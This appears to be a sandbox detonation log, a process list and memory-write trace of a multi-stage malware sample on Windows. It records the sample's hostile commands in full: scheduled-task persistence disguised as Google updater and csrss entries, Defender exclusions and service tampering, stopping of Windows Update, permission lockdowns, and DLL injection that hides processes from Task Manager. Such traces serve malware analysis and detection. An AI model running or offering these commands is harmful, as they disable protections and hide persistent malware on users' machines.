PID 1116 wrote to memory of 4356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4436 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4436 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1796 -ip 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2308 -ip 2308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 584

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ABB1.tmp\ABB2.tmp\ABB3.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,6203320225202508898,1414958446510668348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6203320225202508898,1414958446510668348,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\47F.exe

C:\Users\Admin\AppData\Local\Temp\47F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe

C:\Users\Admin\AppData\Local\Temp\674.exe

C:\Users\Admin\AppData\Local\Temp\674.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1hY00JA7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1hY00JA7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8D7.bat

"C:\Users\Admin\AppData\Local\Temp\8D7.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5904 -ip 5904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 396

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9AF.tmp\9B0.tmp\9B1.bat C:\Users\Admin\AppData\Local\Temp\8D7.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3544 -ip 3544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 228 -ip 228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 540

C:\Users\Admin\AppData\Local\Temp\C04.exe

C:\Users\Admin\AppData\Local\Temp\C04.exe

C:\Users\Admin\AppData\Local\Temp\CF0.exe

C:\Users\Admin\AppData\Local\Temp\CF0.exe

C:\Users\Admin\AppData\Local\Temp\E87.exe

C:\Users\Admin\AppData\Local\Temp\E87.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5616 -ip 5616

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 404

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\564F.exe

C:\Users\Admin\AppData\Local\Temp\564F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\86F5.exe

C:\Users\Admin\AppData\Local\Temp\86F5.exe

C:\Users\Admin\AppData\Local\Temp\89E4.exe

C:\Users\Admin\AppData\Local\Temp\89E4.exe

C:\Users\Admin\AppData\Local\Temp\8F25.exe

C:\Users\Admin\AppData\Local\Temp\8F25.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4820 -ip 4820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

